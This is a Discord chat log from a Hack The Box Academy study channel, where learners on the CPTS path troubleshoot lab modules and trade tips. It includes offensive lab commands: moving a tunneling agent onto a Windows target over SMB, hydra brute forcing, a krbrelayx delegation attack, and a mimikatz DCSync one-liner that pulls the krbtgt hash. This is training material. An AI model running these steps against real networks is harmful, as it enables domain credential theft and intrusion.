should i keep notes about stuff i learn on htb from different modules or should i try to be the thinker and remember it all and with some practice

true 🙂

Always notes

You won’t remember everything

gonna do from no on, tnx

ik

notetaking is very important

So if you have good notes, you can reference them later

Very helpful

i dont have that habit unfortunately

imma try it tho

you need to 🙂

I didn’t either, but ended up having to redo modules because of it

damn

this guy should become a sticker

Some modules like attacking AD requires that you know some fundamentals and will list it in the module overview

Introduction To Active Directory
Linux Fundamentals
Windows Fundamentals
Setting Up
Getting Started
File Transfers
Pivoting, Tunneling, and Port Forwarding

In my opinion, the bloodhound uploaded a corrupted .zip because it aint working, i got the last question which is suppose to be the hardest one... idk, im mentally drained at this point

did you find the guy with "b" ?

isnt that tier 4 module?

AD enum and attacks isn't tier 4

My "spawn machine" button is greyed out

anyone got a fix?

message website support

ok

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

if it's greyed out; simple question would be "are you connected to the vpn"

No bro, it only returns one user

then what is it

tier 3?

tier 2

fair enough

AD enum and attacks is included in the CPTS path

no shit you need fundamentals for higher ranks

which does not contain any modules above tier 2

thats how getting better works

gotta walk before you can run

As a wise man once said "Reading the card, explains the card"

Is smtp the right service to attack or is it ftp or mysql?

My notes show using bloodhound-python, I'm assuming you did something similar?

Sharphound used, its the same i guess?

send me a screnshot via dm if you like

And you exported all into a zip and uploaded that zip?

Exactly, sharphound when executed creates the .zip, feed to bloodhound and that..

well there's a tool that allows you to enumerate usernames from one of the services

honestly having a basic checklist for some services is useful

• FTP
• can I log in as anon
• if so what can I get

I was brute forcing SMB pass there and got nothing the first time but a hit the second time with the same list. Is this something I should plan for? As in run it twice with every list? I wasted a lot of time there.

ensure you have a stable internet connection

That could be a problem

Time for Starlink

Anonymous login isn't available :/

there is a service you can use to enumerate usernames: reread the related sections to the ports you discovered

hello i need help for module https://academy.hackthebox.com/module/24/section/514
my host ping but for topic one i can't get the flag.txt i use : php -r '$file = file_get_contents("https://10.129.225.107/flag.txt"); file_put_contents("flag.txt",$file);'

curl http://10.129.225.107/root/flag.txt | cat
but nothing

What file transfer method did you use to transfer agent.exe from your pwnbox to your windows machine?

I used the smbserver method ...but it has not been working for me.

I tried 'xcopy' this time when copyng ....but its shows zero file has been transfered over. my agent.exe file is in the right directory too.

sudo python3 /usr/local/bin/smbserver.py -smb2support CompData /home/htb-ac-767577/ligolo-ng/agent.exe

net use \10.10.15.83\CompData

xcopy \10.10.15.83\CompData\agent.exe C:\windows\temp\agent.exe

host a python server in your pwnbox , in the windows machine open powershell wget -Uri http://ip:port/file -outfile name.exe

Also if you choose to use xfreerdp the /drive: function will make your life so simple in regards to file transfers

If you do „net use p: \iptoshare“ does it actually map it to the p drive?

I AM NOT SURE but maybe smbserver need a path not a file like /home/htb-ac-..../ligolo-ng/

Awesome tip ty

remmina can do it too

i use it all the time

Crack Passwords with Hashcat: Cracking WPA/WPA2 > Question 1: is anyone else getting this error when they run make && make install?
cc -O3 -Wall -Wextra -Wpedantic -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lssl -lcrypto -lz -DVERSION_TAG="6.3.2-53-g2836d94" -DVERSION_YEAR="2024" -DWANTZLIB
hcxpcapngtool.c:27:10: fatal error: openssl/core.h: No such file or directory
27 | #include <openssl/core.h>
| ^~~~~~~~~~~~~~~~
compilation terminated.
make: *** [Makefile:96: hcxpcapngtool] Error 1

I have already tried updating/upgrading and I'm using the pwnbox. I should probably just switch over to my VM but this seemed like the quicker option

anyone know why my spawn machine is greyed out

No this channel isn't for generic site support

I used nmap to try to enumerate usernames in sql, but I received an error.

Why not another service. You don't need nmap for enumerating username

hey guys how can i access my network or at least my pc from another city ??

Set up a port forward and private vpn. This channel isn't for that kind of thing btw

Read #rules and #welcome

oooh thanks wich channek is for that kind of things ?

Well you don't have access to it until you follow basic instructions in #welcome , #homelab-sysadm

ok thanks

I tried to find smtp users using smtp-user-enum with no results. I found an email address in the nmap output, figured that was the user I needed and tried to brute force ftp, smtp, and mysql with hydra with no results. When I tried using hydra for mysql, I received an error saying there were too many connections. I used a mutated password list and got the same results. I saw in a previous post that ftp was a dead end for hydra, so I am trying to avoid a rabbit hole. I also used Medusa from the previous modules to try to find the password which didn't pan out either.

Hello, I have a problem with the student subscription, I already paid the subscription 1 day ago and it has not yet been activated

Sometimes you need the user@domain or just user. But smtp-user-enum should work

You might need to play with some of the values

someone for help me please ?

Message website support, nothing can be done on discord

question numer ?

1

Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.

And doesn't it take some time to activate?

It should be immediately, but again. Message support via the green bubble on academt

The support staff do not monitor the discord

thx

let me fire it up and try

yes but i do connect ssh and create a web server (python3 -m http.server 8080) on root ? or just use wget http://uri/flag.txt -o flag.txt

flag.txt 100%[===================>] 33 --.-KB/s in 0s

how can i hack wifi

yes

Sorry about this question but how would I transfer the file to a VM target

Download additional_samples.zip from this module's resources (available at the upper right corner) and transfer the .zip file to this section's target

Right click and copy the link

with the hands

and aircrack-ng

Then wget {paste}

Alternatively most vms have methods to transfer from host to vm

||wget 10.129.33.70/flag.txt|| @marsh echo

it must have had a problem now that it works

yes i do the command many times but now it's work

maybe you didnt specified the port

its port 80

oh

no need even spceifying the port didn't work

but tbh i do not know why its "python" in the question

and by default wget takes port 80 if I'm not mistaken

i didnt read all i was assuming that you had to wget the python http server

I haven't figured out how to use python to download the file either except from creating a server on the target and wgeting through it, I don't see how to do it.

it´s probably meant so

but in the question we don't have access to the target

the http.server is done once on the target

thanks

don't worry and thank you

Probably is a transfer from host to VM, because the target has no connection to the internet

You can check gtfobins section on python, it has code on how to download with it but it’s not very elegant looking

i hope we will not need it @cpts 😉

but file transfer is mandatory

i hope too😭

okay thank you a lot now i understand

anyone know why i have this (skill assesement website , Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

What module is this for?

login brute forcing

Anyone know why I am getting this error in the Kerberos Module?

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
Traceback (most recent call last):
  File "/home/htb-ac-722940/krbrelayx/dnstool.py", line 610, in <module>
    main()
  File "/home/htb-ac-722940/krbrelayx/dnstool.py", line 532, in main
    record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
  File "/home/htb-ac-722940/krbrelayx/dnstool.py", line 256, in get_next_serial
    res = dnsresolver.resolve(zone, 'SOA',tcp=tcp)
  File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1030, in resolve
    (request, answer) = resolution.next_request()
  File "/usr/lib/python3/dist-packages/dns/resolver.py", line 584, in next_request
    raise NXDOMAIN(qnames=self.qnames_to_try,
dns.resolver.NXDOMAIN: The DNS query name does not exist: INLANEFREIGHT.LOCAL.```

# Your system has configured 'manage_etc_hosts' as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of 'manage_etc_hosts' in
#     /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

127.0.0.1 localhost
127.0.1.1 htb-c7nmbyteb8 htb-c7nmbyteb8.htb-cloud.com
10.129.205.35    dc01.inlanefreight.local

You have the DC but not the root domain

# Your system has configured 'manage_etc_hosts' as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of 'manage_etc_hosts' in
#     /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

127.0.0.1 localhost
127.0.1.1 htb-c7nmbyteb8 htb-c7nmbyteb8.htb-cloud.com
10.129.205.35    inlanefreight.local
10.129.205.35    dc01.inlanefreight.local

Throws the same error.

Also is the DC on the same ip?

Aka is the target ip the dc?

login brute forcing

I saw your reply

I haven't done this module so I can't offer insight

Maybe the target died

ok

I managed to fix the error by just providing the IP of the DNS server directly. I don't know why it doesn't work when the DNS server IP is added directly to /etc/hosts. However I now get this error... ```
sudo python krbrelayx.py -p C@lluMDIXON
<SNIP>
[] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[] Running in unconstrained delegation abuse mode using the specified credentials.
[] Setting up SMB Server
[] Setting up HTTP Server on port 80
[*] Setting up DNS Server
Exception in thread Thread-2:

[] Servers started, waiting for connections
Traceback (most recent call last):
File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
self.run()
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 539, in run
self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 45, in init
socketserver.TCPServer.init(self,server_address, RequestHandlerClass)
File "/usr/lib/python3.9/socketserver.py", line 452, in init
self.server_bind()
File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
[] SMBD: Received connection from 10.129.205.35
[-] Could not find the correct encryption key! Ticket is encrypted with keytype 23, but keytype(s) were supplied
[] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Well one of the errors is port in use

Looks like you didn’t put the hash for decryption correctly in your setup of krbrelayx

It doesn't appear we're ever given the hash for the callum.dixon account anywhere in the challenge description.

Which module is it?

https://academy.hackthebox.com/module/25/section/831

I solved it by just hashing callums password to NTLM(https://codebeautify.org/ntlm-hash-generator) and providing it in the -hashes argument instead of the plain text password.

I Wonder if it’s the @ in the pw. Mb if you had put the pw in single quotes it would’ve worked

good question.

smtp-user-enum worked out of nowhere so I am trying to brute force ftp. I don't know if this is the best answer though, since I saw in a previous post ftp is a dead end, but smtp and mysql keep returning errors.

I did. this section 2 days ago or so and I can’t even tell you how I did it anymore lol. But your method works too

I rdp-ed into the AD Skills Assessment 2 machine and then ran a pth with the mssqlsvc user with an xfreerdp command and am getting this error:

dig AXFR @10.129.203.6 inlanefreight.htb why does this fail Target: 10.129.203.6

Life Left: 109 minute(s)

• 1 Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. attacking common services

└──╼ $dig AXFR @10.129.203.6 inlanefreight.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> AXFR @10.129.203.6 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
4

Nevemind. I had to look back at the password attack section under "Enable Restriced Admin Mode to Allow PtH"

hitting an openssl error with evilwinrm

Try the command on the subdomains.

Got a screenshot?

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Error: Exiting with code 1

using proxychains

@heavy marsh can i dm u

https://github.com/BlackArch/blackarch/issues/3593#issuecomment-1326265740

DF001's comment works if I remember correctly

If it's spoilers sure, otherwise I like things out in plain view so it's searchable.

Someone posted this in erratum 10/13/2023 @ 5:31am:

I got some feedback for Module: Password Attacks
Right as the first practice, we should use evil-winrm. At least on my blackarch system this does not work at all out of the box. I get the following error:

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint

Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Error: Exiting with code 1

After some googling, I found this: https://forum.manjaro.org/t/openssl-issue-with-ruby-3-0-6p216/147369
It seems to be related to a blacklisting of the MD4 algorithm. You need to modify the file /etc/ssl/openssl.cnf for it to work.
I feel like this should be mentioned in the module.

its not allowing me to post screenshots

my targets an windows box

There is something you have to do to verify your account so that you can post screenshots

I forget how. I remember jumping through a bunch of hoops when I first joined.

Edit that OpenSSL config file with the instructions above and try again.

What module/section/question?

#welcome

im on attacking enterprize network

i added the text to the openssl file and its still erroring out

Oh I'm not there yet. Still in AD

I feel like I've got that error before though.

i finished ad today

i gotta evilwinrm into this box to proceede and keep hitting this error i had lingolo up but it didnt like it so i followed the section and forwarded ports to tunnel into the network but im stuck maybe i should restart with kali on my personal parrot vm at the moment

im 99% finished with the cpts path and an error is holding me up not ready for the test due to my lack of report skills but would like to beable to finish this section

i use chisel to pivot

and changed to my own vm since AD module

yeah im on the latest parrot vm not pwnbox only have had luck with ligolo-ng the whole pivoting tunneling module was broken for me and support couldnt help

just messaged support the bot told me noones in the office until saturday

lol like a real pentest 😄

dig AXFR @10.129.203.6 inlanefreight.htb why does this fail Target: 10.129.203.6

Life Left: 109 minute(s)

• 1 Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. attacking common services
  └──╼ $dig AXFR @10.129.203.6 inlanefreight.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> AXFR @10.129.203.6 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
4 do ihave to add the ip to the dns server?

in /etc/hosts

Hmm... I am connect trought openvpn > VMWare kali ... But cant ping the the machine at all? if i go for ifconfig, i can see i am on the same network 10.10.11~? same withi nmap doesnt show anything.. And the site says i am connet can see out/in etc.. I am just stupid today? ^^

Which section talks about mimikatz one-liners?

.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit"

like that one?

AD : credentials probably

Can't find it there

I know I read it somewhere

no notes ?

not in my notes, found it somewhere else

I would like to know whether it is something I should have just figured out on my own or something covered in the modules

I just finished AD Skills Assessment Part 2

i did too today

Nice!

it was quite chaalenging

Yeah, I needed a lot of help

congrats that one was hard

If I hadn't got hints like the mimikatz one-liner I would have been so lost!

Just trying to figure out where I missed that one

youll be using theat methodology going forward

AD - section 28